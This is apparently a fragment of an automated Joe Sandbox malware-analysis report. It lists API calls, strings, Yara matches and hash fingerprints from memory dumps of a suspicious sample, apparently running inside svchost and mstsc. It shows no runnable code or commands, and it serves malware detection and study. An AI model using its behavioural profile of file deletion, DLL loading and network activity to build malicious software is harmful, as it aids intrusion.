                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03CA728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 03CA72A3
                                                • RTL: Re-Waiting, xrefs: 03CA72C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03CA7294
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280

                                                Execution Graph

                                                Execution Coverage: 1.6%
                                                Dynamic/Decrypted Code Coverage: 0%
                                                Signature Coverage: 0%
                                                Total number of Nodes: 3
                                                Total number of Limit Nodes: 0

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.3900775999.0000000006310000.00000040.80000000.00040000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_6310000_YKkstfciYBQ.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: socket
                                                • String ID:
                                                • API String ID: 98920635-0

                                                Execution Graph

                                                Execution Coverage: 3%
                                                Dynamic/Decrypted Code Coverage: 4.1%
                                                Signature Coverage: 0.6%
                                                Total number of Nodes: 467
                                                Total number of Limit Nodes: 76
83320 49f9dc 83319->83320 83321 4ab250 RtlFreeHeap 83320->83321 83321->83300 83322 49f975 83322->83318 83323 4a8cb0 LdrInitializeThunk 83322->83323 83323->83322 83325 496225 83324->83325 83349 4a8b60 83325->83349 83328 4a6d40 83329 4a6da5 83328->83329 83330 4a6dd8 83329->83330 83354 4a0261 RtlFreeHeap 83329->83354 83330->83302 83332 4a6dba 83332->83302 83334 49f49c 83333->83334 83335 494370 LdrLoadDll 83334->83335 83337 49f4ba 83335->83337 83336 49f4c3 83336->83307 83337->83336 83338 494370 LdrLoadDll 83337->83338 83339 49f58e 83338->83339 83340 494370 LdrLoadDll 83339->83340 83341 49f5eb 83339->83341 83340->83341 83341->83307 83344 49f3d5 83342->83344 83343 49f46b CoUninitialize 83343->83316 83344->83343 83346 4a8cca 83345->83346 83355 4562ba0 LdrInitializeThunk 83346->83355 83347 4a8cf7 83347->83322 83350 4a8b7d 83349->83350 83353 4562c60 LdrInitializeThunk 83350->83353 83351 496299 83351->83300 83351->83328 83353->83351 83354->83332 83355->83347 83356 4959e0 83357 497f60 LdrInitializeThunk 83356->83357 83359 495a10 83356->83359 83357->83359 83360 495a3c 83359->83360 83361 497ee0 83359->83361 83362 497f24 83361->83362 83363 497f45 83362->83363 83368 4a8520 83362->83368 83363->83359 83365 497f35 83366 497f51 83365->83366 83367 4a91d0 NtClose 83365->83367 83366->83359 83367->83363 83369 4a859d 83368->83369 83370 4a854e 83368->83370 83373 4564650 LdrInitializeThunk 83369->83373 83370->83365 83371 4a85bf 83371->83365 83373->83371 83374 49ffa0 83375 49ffbd 83374->83375 83376 494370 LdrLoadDll 83375->83376 83377 49ffdb 83376->83377 83378 4a6d40 RtlFreeHeap 83377->83378 83379 4a0165 83377->83379 83378->83379 83380 4a8ee0 83381 4a8f94 83380->83381 83383 4a8f0f 83380->83383 83382 4a8fa7 NtCreateFile 83381->83382 83384 4a1960 83388 4a1979 83384->83388 83385 4a1a09 83386 4a19c4 83387 4ab250 RtlFreeHeap 83386->83387 83389 4a19d4 83387->83389 83388->83385 83388->83386 83390 4a1a04 83388->83390 83391 4ab250 RtlFreeHeap 83390->83391 83391->83385 83402 4a1161 83403 4a1173 
83402->83403 83415 4a9040 83403->83415 83405 4a1182 83406 4a11a0 83405->83406 83407 4a11b5 83405->83407 83408 4a91d0 NtClose 83406->83408 83409 4a91d0 NtClose 83407->83409 83410 4a11a9 83408->83410 83412 4a11be 83409->83412 83411 4a11f5 83412->83411 83413 4ab250 RtlFreeHeap 83412->83413 83414 4a11e9 83413->83414 83416 4a90e7 83415->83416 83418 4a906e 83415->83418 83417 4a90fa NtReadFile 83416->83417 83417->83405 83418->83405 83419 490c3b PostThreadMessageW 83420 490c4d 83419->83420 83423 4ac470 83424 4ab250 RtlFreeHeap 83423->83424 83425 4ac485 83424->83425 83426 492f33 83427 497be0 2 API calls 83426->83427 83428 492f43 83427->83428 83429 4a91d0 NtClose 83428->83429 83430 492f5f 83428->83430 83429->83430 83431 4a9130 83432 4a91a4 83431->83432 83434 4a915b 83431->83434 83433 4a91b7 NtDeleteFile 83432->83433
                                                APIs
                                                • NtReadFile.NTDLL(?,?,?,8425A42C,?,?,?,?,?), ref: 004A9123
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 004A9204
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2c1563af0205f4ffa8d140e736a6325945c12b8c04c8e45ac57ae38c0122e091
                                                • Instruction ID: ee8edcbf621cb0824334b0e1d2472cbcb3100ee2f1618637eb91acfb5f077917
                                                • Opcode Fuzzy Hash: 2c1563af0205f4ffa8d140e736a6325945c12b8c04c8e45ac57ae38c0122e091
                                                • Instruction Fuzzy Hash: E290026134140443F10071585418B061045DBE1315F59C035E1065554D8619DD527126
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f726926354531e0c4240a0306e41afc85df0f4ae2d45be4f94f5cd4cc3fb07c9
                                                • Instruction ID: 42d19e272070ab2aece402a35d61c374bbd9b9140fe5c16974ec6d8eff97cdc4
                                                • Opcode Fuzzy Hash: f726926354531e0c4240a0306e41afc85df0f4ae2d45be4f94f5cd4cc3fb07c9
                                                • Instruction Fuzzy Hash: 38900221211C0043F20075685C18B0710459BD0317F59C135A0155554CC915D9616521
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 80162b598cb603bbaef9173b013ee15ab2a6818cc1f2e6b836f2b550a5b171da
                                                • Instruction ID: b1f4acab9003b0547cb9631ffc3705c340c0b5c36a6d00348cdf20d3daeddb43
                                                • Opcode Fuzzy Hash: 80162b598cb603bbaef9173b013ee15ab2a6818cc1f2e6b836f2b550a5b171da
                                                • Instruction Fuzzy Hash: AD900221601400436140716898489065045BFE1225759C131A0999550D8559D9656665
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e4ccfc824f49e11f90225b2f14d2b60da7f2345516d925717b86ad1f5ed058f8
                                                • Instruction ID: 36b25106e46cf3070012a1eb2d4a4d7bb24cbd0ec34bba7d8f77bf6aeaa62e29
                                                • Opcode Fuzzy Hash: e4ccfc824f49e11f90225b2f14d2b60da7f2345516d925717b86ad1f5ed058f8
                                                • Instruction Fuzzy Hash: 6690022124545103F150715C54086165045BBE0215F59C031A0815594D8555D9557221
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2b8a83d615065c1205e601ef56e8ca58d4096f498baf98bfdf8de8f999acdc33
                                                • Instruction ID: ea16fb98e45fb0956d81b4fcb0b9b814cee72ae1598f6336b8c23751fef10d98
                                                • Opcode Fuzzy Hash: 2b8a83d615065c1205e601ef56e8ca58d4096f498baf98bfdf8de8f999acdc33
                                                • Instruction Fuzzy Hash: 70900225211400032105B558170850710869BD5365359C031F1016550CD621D9616121
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: aacb2573d21104657af4bb1692d19e3a2c3d5bdc35168a103a5e618e60b09e37
                                                • Instruction ID: d8c26501daa214b711e123375dab88a1aface8516e5b9be43e8b9ec29a60d13f
                                                • Opcode Fuzzy Hash: aacb2573d21104657af4bb1692d19e3a2c3d5bdc35168a103a5e618e60b09e37
                                                • Instruction Fuzzy Hash: 60900225221400032145B558160850B1485ABD6365399C035F1417590CC621D9656321
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9aeed9a0e49d990506707909f10810b70ad90d48ec5b088e95f30bf1c618fefb
                                                • Instruction ID: 2210919ebb985fc7b54288cf86f9faab11afb86523914287cf8a27189a71d337
                                                • Opcode Fuzzy Hash: 9aeed9a0e49d990506707909f10810b70ad90d48ec5b088e95f30bf1c618fefb
                                                • Instruction Fuzzy Hash: A790026120240003610571585418616504A9BE0215B59C031E1015590DC525D9917125
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b58a0b391df063a78ee4e684351e2593616872820e1ad31ea6b306cd367a1bc0
                                                • Instruction ID: 11bfd8b6d539e6d8c1a646d502600f8d04fe8af5d7cc921c0c26a7b36145c1f0
                                                • Opcode Fuzzy Hash: b58a0b391df063a78ee4e684351e2593616872820e1ad31ea6b306cd367a1bc0
                                                • Instruction Fuzzy Hash: 6E90023120140803F1807158540864A10459BD1315F99C035A0026654DCA15DB5977A1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4ac86b2d1f68183cf954c1bf4321e65573c3682d19264c8bfdc9db2b10b513d4
                                                • Instruction ID: 8071c73653cca747197d48c6b29558b3e4cbf58a0afbd7c3ae752d22714ae6bf
                                                • Opcode Fuzzy Hash: 4ac86b2d1f68183cf954c1bf4321e65573c3682d19264c8bfdc9db2b10b513d4
                                                • Instruction Fuzzy Hash: D190023120544843F14071585408A4610559BD0319F59C031A0065694D9625DE55B661
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 57dc70d2a811cd5d65bad0df4d95709a763362ad08b2fe12fe37c7091cb3e0ff
                                                • Instruction ID: a403c4c12489cde3cbecb6537161de93861404ef4ead4d022622d046854b5eeb
                                                • Opcode Fuzzy Hash: 57dc70d2a811cd5d65bad0df4d95709a763362ad08b2fe12fe37c7091cb3e0ff
                                                • Instruction Fuzzy Hash: 6D90023160540803F1507158541874610459BD0315F59C031A0025654D8755DB5576A1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitializeUninitialize
                                                • String ID: @J7<
                                                • API String ID: 3442037557-2016760708
                                                • Opcode ID: 95cab754c156ec44e772b305c88b0ea27e5ece26f81be27aa0f1c5628ca618aa
                                                • Instruction ID: d4d41a3914f96f7398e1d79c712abb661b55d88df8db5ac72cccd5fb77027eed
                                                • Opcode Fuzzy Hash: 95cab754c156ec44e772b305c88b0ea27e5ece26f81be27aa0f1c5628ca618aa
                                                • Instruction Fuzzy Hash: 8A3140B5A0060AAFDF00DFD8C8809EFB7B9FF89304B108569E505EB215D775AE05CBA0
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 004A39FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: wininet.dll
                                                • API String ID: 3472027048-3354682871
                                                • Opcode ID: 5d0558d2e442f23693483771b6b27b7c52766ba302a34b4781d3df11571f4a7b
                                                • Instruction ID: 597fdaa5ce0b556de5d4d3a74065b5a010ba7dae650aae629e66ffc659bc7e11
                                                • Opcode Fuzzy Hash: 5d0558d2e442f23693483771b6b27b7c52766ba302a34b4781d3df11571f4a7b
                                                • Instruction Fuzzy Hash: 86318DB1600705BBC714DFA5C881FEBBBBCEB89704F50452EF6496B241D774AB408BA9
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 004981FC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 8424925addbbab25d62e9b62a130398eeb4a3f09ed71f2d187890bfe43d03395
                                                • Instruction ID: db8107d2abbef482d767ca68bf785d412c94f0c3d3003f0e740e5c9cd5251e62
                                                • Opcode Fuzzy Hash: 8424925addbbab25d62e9b62a130398eeb4a3f09ed71f2d187890bfe43d03395
                                                • Instruction Fuzzy Hash: 0FE0613820050426EF249B78CD42FB637109F46368F1402B8FC59DF2D1D67CD4424700
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 004981FC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
